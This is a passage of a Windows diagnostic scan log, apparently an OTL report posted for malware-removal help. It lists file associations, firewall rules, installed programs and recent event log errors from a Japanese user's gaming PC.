https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = AC 1C AE C5 46 9F CE 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = [binary data]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = Reg Error: Unknown registry data type -- File not found

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{009099D3-EA5F-4753-922B-BBC861E62234}" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{01503B34-1D0D-4851-AE1E-F6235AB60B6D}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{0794E7E3-08AC-4E18-A08A-96D5910E1D96}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{07C938AA-F54B-468F-8A11-4C3CD7FE6D72}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{08AAB086-AB6F-43DE-A154-803165802B85}" = dir=out | name=windows_ie_ac_001 |
"{0BB8AC33-4C3D-426C-8439-A58A243DDC61}" = protocol=17 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{0C4FFAB4-C30E-4DAE-8FC0-209BE23F0567}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{0D33A481-D37D-400E-983F-C556CA957413}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{118CA08C-7527-4138-B10B-61CE7D7A7AB7}" = dir=out | name=@{microsoft.bingnews_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/news} |
"{14D799F3-5410-494D-8FD3-02501D10B9E6}" = dir=out | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{1A906073-519D-4B77-8F4E-19CE44CA9EC5}" = protocol=6 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{210AA50F-D6BA-4A65-9C41-303E2E335D3F}" = dir=out | name=@{microsoft.bingfoodanddrink_3.0.4.313_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} |
"{21E05156-F8E3-4500-9677-9BB6B6F22984}" = dir=out | name=@{microsoft.binghealthandfitness_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} |
"{22A77403-B354-46CE-8C90-8938EF20012C}" = dir=out | name=windows_ie_ac_001 |
"{2E0932F0-D12C-477D-B5E1-83DF03447ED8}" = dir=in | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{2F9CEED4-58E8-42D6-8102-B5D444F908B9}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{325804B3-4C52-45BA-A270-2B1888F9B611}" = protocol=17 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{346C9C59-91EE-44C6-99A2-E663E8390F50}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{3CA7E038-2B5E-48C7-9FF0-05D045E607D4}" = dir=out | name=@{microsoft.zunemusic_2.6.672.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} |
"{3DD1F688-6FA9-4923-8337-7E1289BDAE8B}" = dir=out | name=@{microsoft.bingweather_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/brandedapptitle} |
"{3EE68DC6-786E-43D5-9C0F-E1A182DF1B62}" = dir=out | name=@{microsoft.bingtravel_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} |
"{41ECA379-9074-4EE1-928B-46DF51AFEBB3}" = dir=in | name=onenote |
"{4282FE99-8560-4BC7-9576-5F3ED84E263F}" = dir=in | name=checkpoint.vpn |
"{44E6995E-9E85-4A20-86A7-8FF9C8F374E5}" = dir=in | name=check point vpn |
"{47F6BBF7-2074-4CC5-A3CF-85A61EE9FB7C}" = dir=in | name=juniper networks junos pulse |
"{48A40ABC-7AAD-4F73-8CCE-2FD72215616C}" = dir=out | name=@{microsoft.xboxlivegames_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{4A95F02E-910A-416E-8DF3-70DA09C188B0}" = dir=in | app=c:\gameon\archeage\bin32\patcher.exe |
"{4AECD572-300B-4486-A703-D5A7C94722B6}" = protocol=6 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{4BB56D50-0173-49B5-80AB-9C93C8B7F376}" = dir=out | name=@{microsoft.zunevideo_2.6.439.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{4D028C29-2A66-4D21-B069-C9B4F45C4F38}" = protocol=6 | dir=in | app=c:\x-legend\genshin\game.bin |
"{4F3DFDB5-0D90-4943-90B1-92B2A09E6B78}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{548DCF8C-BFF2-4BA4-AA88-FBAF9AC8BCC6}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{560448D6-095C-4907-B046-AC7F710701A7}" = dir=in | name=sonicwall.mobileconnect |
"{5812DF6F-6B13-49D7-9A04-2DF6F2FC2505}" = dir=out | name=@{microsoft.bingtravel_1.2.0.145_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/apptitle} |
"{58F515B0-A0AF-4B94-9C01-387DA208C55E}" = dir=in | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{5F4632C0-D5B1-40C3-B0D9-E3A759C81B9E}" = dir=out | name=sonicwall.mobileconnect |
"{67610D71-5A2C-4315-B346-AA5BE03D5705}" = dir=out | name=skype |
"{67C713B4-BD9F-439A-861E-00790CEE951D}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{6D25CB15-AAC4-4EF2-BFEF-5A0CA80F6C13}" = dir=out | name=@{microsoft.bingmaps_2.1.3230.2048_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{6DD87F49-B93F-40E4-B6E8-8F998CB3BD57}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6FE1A57A-8E2E-40D9-B61A-272EA4B8188C}" = protocol=17 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{76CE7216-802A-43BA-BB1C-225CB7CE7C05}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{79F84839-B842-454A-91A4-1C9E3176E337}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{7A9FEC2A-DDE1-4CE6-97EC-2F949B5526FE}" = dir=out | name=f5 vpn |
"{7DBB95E5-37D6-481E-8FF0-7783952AF05F}" = dir=out | name=@{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{7E8F1B59-2239-4BBC-8755-6B3D95FD9DD6}" = dir=in | name=f5 vpn |
"{808F1451-4108-46FD-ADBB-F17324B5F0BD}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{8406D4F5-256C-43E5-A90C-0915D5C65380}" = dir=in | name=sonicwall mobile connect |
"{851380EB-0379-4378-BF16-F67C424904B1}" = dir=out | name=sonicwall mobile connect |
"{85FBE51D-AA48-4E64-893B-54C714543CA1}" = dir=out | name=@{microsoft.zunevideo_1.5.802.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{88FB3814-4513-4CBC-A873-B0565593EE8C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{8EBA722B-09CB-4FB2-A1BC-6CDEDCFD99BD}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{9503C259-12DD-4649-8CDA-6E4809E16AE9}" = protocol=17 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{9740BE23-0938-4BE8-BA8B-B19AEF8CCCD2}" = dir=out | name=@{microsoft.bingweather_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/apptitle} |
"{9C8F71E3-B323-4721-95F2-40A687DC9B15}" = dir=out | name=@{microsoft.bingfinance_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} |
"{9CC63241-376E-4B47-9B74-7DCEEBD4C269}" = dir=out | name=@{microsoft.bingfinance_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/apptitle} |
"{9E3D57FC-7C37-4424-9352-4831E97D029D}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{A3A01DAC-93C5-4C92-925C-2A0870197B4F}" = dir=out | name=@{microsoft.bingsports_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/bingsports} |
"{A57F4810-E33D-48B9-8CD6-F41DC29CE35A}" = dir=out | name=windows_ie_ac_001 |
"{A899EF9B-C249-42C9-980D-E60A6109B2C3}" = dir=out | name=@{microsoft.bingnews_3.0.4.268_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} |
"{AE2227F9-370C-4BB4-AB89-074B2699E94C}" = dir=out | name=@{microsoft.zunemusic_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/33273} |
"{B1758FE6-CF15-4E73-876D-FFFA588AA083}" = protocol=6 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{BC3CFB2F-5334-4003-B754-9F8BBD34068A}" = dir=out | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{BF0B3553-784A-4EE0-A754-E2D38153E48E}" = dir=in | name=skype |
"{C8686564-1AED-42A5-A078-2A7D9FD17165}" = dir=out | name=@{microsoft.bingmaps_1.2.0.136_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{CAFB1352-EBDD-4C41-8F64-4B9CEA699B4F}" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{CB29A369-30CE-46A5-9934-278594A971BB}" = protocol=6 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{CD460E5F-1B4F-4C07-B99D-5DF1F33B4F13}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{CF427883-F6F5-4AAD-8F75-0F160842B0EA}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{D1BA3E33-5488-462A-9C0C-4880B3F7CDBE}" = protocol=17 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{D6980480-941A-4DF6-AB81-3734ECD3D779}" = dir=out | name=junipernetworks.junospulsevpn |
"{D76D9E58-C01A-473F-A7CB-47785C4C2E82}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{DB59588E-ED90-4C47-A7B5-7929DD0C0BD2}" = dir=out | name=checkpoint.vpn |
"{DBECC510-D1DD-454B-85CD-97313FBD73EB}" = dir=out | name=@{microsoft.bingsports_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} |
"{DCD48588-DEA0-4613-963F-BC8CC77C49BC}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{DCD948A7-1D06-4871-9792-B2752D45583F}" = dir=out | name=check point vpn |
"{DF499B6B-9406-4233-B8CE-C13A3DFC521E}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}" = protocol=17 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E4C3F353-F3AD-497D-AE4C-2E0C296265E3}" = protocol=6 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}" = protocol=6 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}" = protocol=6 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{E7985E1D-C36F-4787-80A8-6350D07E9266}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{EC799E33-72BA-42D7-9127-DEFE68F9799D}" = dir=in | name=junipernetworks.junospulsevpn |
"{EFCF6019-F00D-46D9-9568-FC9EDD5193DE}" = dir=out | name=juniper networks junos pulse |
"{F0814EEE-9BD1-4B78-BA85-D63612A6227D}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{F1DFDFB7-40CA-48F0-8D06-BB59F49CC5A5}" = protocol=17 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F64300AD-D559-4000-BD45-0997BCC8E70A}" = dir=out | name=f5.vpn.client |
"{F6E9C483-518F-4BA7-BE4E-18648C6C864E}" = protocol=6 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F77E5446-4378-4E99-8B7A-7061AAAEA193}" = dir=in | name=f5.vpn.client |
"{FAD92456-5BB0-48C9-B2CB-9DBFF3B7D09B}" = dir=in | app=c:\users\ryota\appdata\local\microsoft\skydrive\skydrive.exe |
"{FAFE2CDC-A429-42D3-8523-6605AF848939}" = protocol=17 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{FD921E2A-65D4-4167-AFA4-DC2516117E3B}" = dir=out | name=onenote |
"{FE80C7E8-BDE8-4A38-9DCD-19C3B3279627}" = protocol=17 | dir=in | app=c:\x-legend\genshin\game.bin |
"{FEC124A2-8A36-4429-B6E5-69606B431A45}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{FEF57493-E3E4-46BE-B716-C6194636F110}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"TCP Query User{1B62F5B2-E035-4CAC-89D1-AB5CD5F2FA58}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"TCP Query User{5D33A37A-B027-42EB-A52A-F66CA11D904E}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=6 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |
"TCP Query User{66DEA66C-65DC-401C-A8BC-D2C3958F5C25}C:\windows\downloaded program files\plauncher.exe" = protocol=6 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"TCP Query User{B53C7C76-8A3C-46CD-AE85-FC73C4DB66D3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"TCP Query User{B91BCF46-2455-4390-9659-D1523BCF5883}C:\nexon\talesweaver\talesweaver.exe" = protocol=6 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"TCP Query User{C0B057B5-CB88-4A89-9643-0181FD4BFD9B}C:\hangame\arad\arad.exe" = protocol=6 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{23E0F26C-D8BC-4DAA-B721-AF2C7FCF668E}C:\windows\downloaded program files\plauncher.exe" = protocol=17 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"UDP Query User{275D5791-F993-4252-BDC3-BBA0D5741839}C:\nexon\talesweaver\talesweaver.exe" = protocol=17 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"UDP Query User{4EB623EB-C127-4E8D-8B88-D3E06BEAA1A9}C:\hangame\arad\arad.exe" = protocol=17 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{556839B5-2CFB-450A-9B71-38C85B89F9F7}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"UDP Query User{DA29FC43-1442-49EB-B01F-F3A967F386E3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"UDP Query User{EEB81633-0C5D-4ECD-9A23-ACB55A76545A}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=17 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1B2C85A0-2B9E-4291-8B37-468D57503E98}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{2EDC2FA3-1F34-34E5-9085-588C9EFD1CC6}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
"{4DF9BC73-D405-4C3B-A0EA-1E390A8AFC73}" = Update for Japanese Microsoft IME Standard Dictionary
"{6A1E4EFB-3EE0-40A0-9D6D-E865370289DB}" = Google 日本語入力
"{764384C5-BCA9-307C-9AAC-FD443662686A}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
"{977D1ABF-4089-4CA7-BA33-CC75808B7ACE}" = Intel® Trusted Connect Service Client
"{B678797F-DF38-4556-8A31-8B818E261868}" = Apple Mobile Device Support
"{B939BFEB-824F-4456-A4EE-2B86ED04033D}" = Update for Japanese Microsoft IME Trending Words Dictionary
"{E9F0BCD8-6BD5-1ED7-EDA3-9FCF2A478AA1}" = Microsoft App Update for microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe (x64)
"{F46AA0F1-E284-4878-A462-5F11B9166C0E}" = iTunes
"CCleaner" = CCleaner
"utvideo_is1" = Ut Video Codec Suite

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0659E943-DDF4-44FC-9FEE-A13B09F8BB08}" = Adobe Flash Media Live Encoder 3.2
"{111EE7DF-FC45-40C7-98A7-753AC46B12FB}" = QuickTime 7
"{15015752-9990-4516-A2B1-93823281FB8E}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{20D4A895-748C-4D88-871C-FDB1695B0169}" = Platform
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype(TM) 7.3
"{33F7A957-A66D-45A1-BADF-6576083B14E2}" = RPGツクール2000 ランタイムパッケージ
"{3CCC5A1C-3DDF-4126-B9DC-EDFC6A0E16A0}" = Hounds
"{3D6AD258-61EA-35F5-812C-B7A02152996E}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis
"{57383270-6F61-4DC8-A9B8-C1745FC29F38}" = USB PC Camera (SN9C102)
"{5982DE66-98C4-4351-AADB-61EC2CAE0B94}" = LightCapture
"{5A02FE73-5313-4467-8282-4974B6E333D4}" = MyBookEditor4
"{5AF4B3C4-C393-48D7-AC7E-8E7615579548}" = Adobe AIR
"{60E90BFF-5BE4-4DA9-9094-EC2C9AE6238E}" = モンスターハンター フロンティアG
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6D1221A9-17BF-4EC0-81F2-27D30EC30701}" = Skype Click to Call
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{78002155-F025-4070-85B3-7C0453561701}" = Apple Application Support
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78CE66A9-85AF-4BD8-8FB7-35B5F3846C00}" = Update for Japanese Microsoft IME Standard Extended Dictionary
"{7DB71278-9AD7-4480-AB08-8649C5010B17}" = Update for Japanese Microsoft IME Standard Dictionary
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{933B4015-4618-4716-A828-5289FC03165F}" = VC80CRTRedist - 8.0.50727.6195
"{95716cce-fc71-413f-8ad5-56c2892d4b3a}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610
"{9864624D-FE15-422F-BDBB-5DC0D9AA904A}" = Gamepot Web実行環境
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9D646264-E17E-4E82-A7DF-CA59A9F10648}" = TuneUp Utilities Language Pack (ja-JP)
"{a1909659-0a08-4554-8af1-2175904903a1}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610
"{A6057B4B-F75B-418A-8A26-C9F27859A150}" = 幻想神域
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1041-7B44-AB0000000001}" = Adobe Reader XI (11.0.10) - Japanese
"{BF606435-86FF-43D3-97CB-65F6C6B9ACFA}" = ニコ生デスクトップキャプチャー(XP) SEASON2
"{E3D1594B-8077-42C9-8541-B8438F52F283}" = Niconico Live Encoder
"{E3F7F270-4ADD-3DA6-8B35-A924C134D49F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"{E7D4E834-93EB-351F-B8FB-82CDAE623003}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F59AC46C-10C3-4023-882C-4212A92283B3}_is1" = Lagarith Lossless Codec (1.3.27)
"{F63BF3C0-D774-11D5-9241-444553540000}" = eo接続ツール
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) SDK for OpenCL - CPU Only Runtime Package
"Adobe AIR" = Adobe AIR
"Adobe Flash Player NPAPI" = Adobe Flash Player 17 NPAPI
"Age of Empires 2.0" = Microsoft Age of Empires II
"Age of Empires II: The Conquerors Expansion 1.0" = Microsoft Age of Empires II: The Conquerors Expansion
"AmaRecTV Live" = AmaRecTV Live
"AmvVideoCodec" = AmvVideoCodec
"ApplicationManager" = ApplicationManager 2011.4.27.209
"ArcheAge" = ArcheAge
"au Wi-Fi接続ツール" = au Wi-Fi接続ツール
"chorokuf" = ♪超録 - パソコン長時間録音機 フリーウェア版
"DAEMON Tools Lite" = DAEMON Tools Lite
"DC-Bass Source" = DC-Bass Source 1.3.0
"DivX Setup" = DivXセットアップ
"ffdshow_is1" = ffdshow v1.1.4399 [2012-03-22]
"Google Chrome" = Google Chrome
"herdProtectScan" = herdProtect Anti-Malware Scanner
"iFunbox_is1" = iFunbox (v2.94.2520.758), iFunbox DevTeam
"InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}" = VIA プラットフォーム･デバイス･マネージャ
"klive" = KDrive
"kliveaddin" = KDriveプラグイン
"LAME_is1" = LAME v3.99.3 (for Windows)
"Lhaplus" = Lhaplus
"LimeChat 2" = LimeChat 2
"LINE" = LINE
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware バージョン 1.75.0.1300
"Mozilla Firefox 37.0.1 (x86 ja)" = Mozilla Firefox 37.0.1 (x86 ja)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"OpenSource Flash Video Splitter" = OpenSource Flash Video Splitter 1.0.0.5
"Pmang" = Pmangインストールマネージャー
"Pmang_archeage" = ArcheAge
"Pmang_common" = Common
"Pmang_tera" = TERA
"Project 64_is1" = Project 64 version 2.1.0.1
"RPGVXAce_RTP_is1" = RPGツクールVX Ace RTP
"SoundEngine Free" = SoundEngine Free
"Steam" = Steam
"Steam App 221380" = Age of Empires II: HD Edition
"SysInfo" = Creative システム インフォメーション
"TalesWeaver" = TalesWeaver
"vsfilter_is1" = DirectVobSub 2.40.4209
"つよきす３学期" = つよきす３学期

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Hangame.com" = Hangame
"NeoplePlugin" = NeoplePlugin
"OneDriveSetup.exe" = Microsoft OneDrive
"俺たちに翼はないＲ" = 俺たちに翼はないＲ

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/04/18 5:56:35 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:41:59 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:51:23 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 8:19:12 | Computer Name = nametuki | Source = ESENT | ID = 215
Description = WinMail (2392) WindowsMail0: クライアントがインスタンスを中止したか、またはクライアントとの接続に失敗したため、バックアップを停止しました。

Error - 2015/04/19 8:46:26 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
